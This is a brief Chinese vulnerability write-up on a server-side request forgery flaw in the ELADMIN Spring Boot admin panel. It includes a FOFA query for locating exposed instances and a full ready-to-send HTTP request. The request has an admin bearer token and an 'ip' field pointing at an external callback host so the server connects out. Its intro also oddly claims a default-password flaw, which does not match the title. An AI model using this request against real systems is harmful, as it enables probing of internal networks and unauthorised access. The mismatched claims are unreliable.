登录 白背景

ELADMIN 后台管理系统存在后台SSRF漏洞

一、漏洞简介

ELADMIN 是一个基于 Spring Boot 的开源后台管理系统,它采用前后端分离的设计,集成了多种技术栈,包括 Mybatis-Plus、JWT、Spring Security、Redis 和 Vue。这个系统提供了丰富的功能,如用户管理、角色管理、菜单管理、部门管理、字典管理、系统日志、SQL监控、定时任务等。它还支持代码生成器,可以一键生成前后端代码,从而提高开发效率。ELADMIN 的主要特点包括使用最新技术栈、高效率开发、支持数据字典、接口限流、接口级别的功能权限与数据权限、自定义权限注解、前后端统一异常拦截处理等。此外,ELADMIN 还提供了丰富的系统功能,如代码生成、邮件工具、七牛云存储、支付宝支付、服务监控等。ELADMIN 存在默认口令漏洞

二、影响版本

  • ELADMIN

三、资产测绘

  • fofa"ELADMIN"
  • 特征

1723138226201-133e9e69-7cbc-453e-b0f6-95d3d649ca25.png

四、漏洞复现

POST /eladmin-server/api/serverDeploy/testConnect HTTP/1.1
Host: 
Content-Length: 203
Sec-Ch-Ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"
Accept: application/json, text/plain, */*
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJqdGkiOiJlNmYyYmFlMDcwYTQ0NjU5ODFhODBjY2M1OTRlNzE4YiIsInVzZXIiOiJhZG1pbiIsInN1YiI6ImFkbWluIn0.xSKybdJCul_63jTXwiY7x-rG31lIayjOQCtY3ZcHzVS5OvjkTvcqrf6gt8KCH_PRMVpcwAFAY6gX_aW6A278YQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"id":5,"name":"test","ip":"ksbtyyxmws.iyhc.eu.org","port":22,"account":"test","password":"''","createBy":"admin","createTime":"2024-08-09 01:35:20","updateBy":"admin","updateTime":"2024-08-09 01:35:20"}

1723138653727-a7ce8b84-a8c2-4ead-9803-e3993a83670d.png

原文: https://www.yuque.com/xiaokp7/ocvun2/gkk7l5a7b88sbyef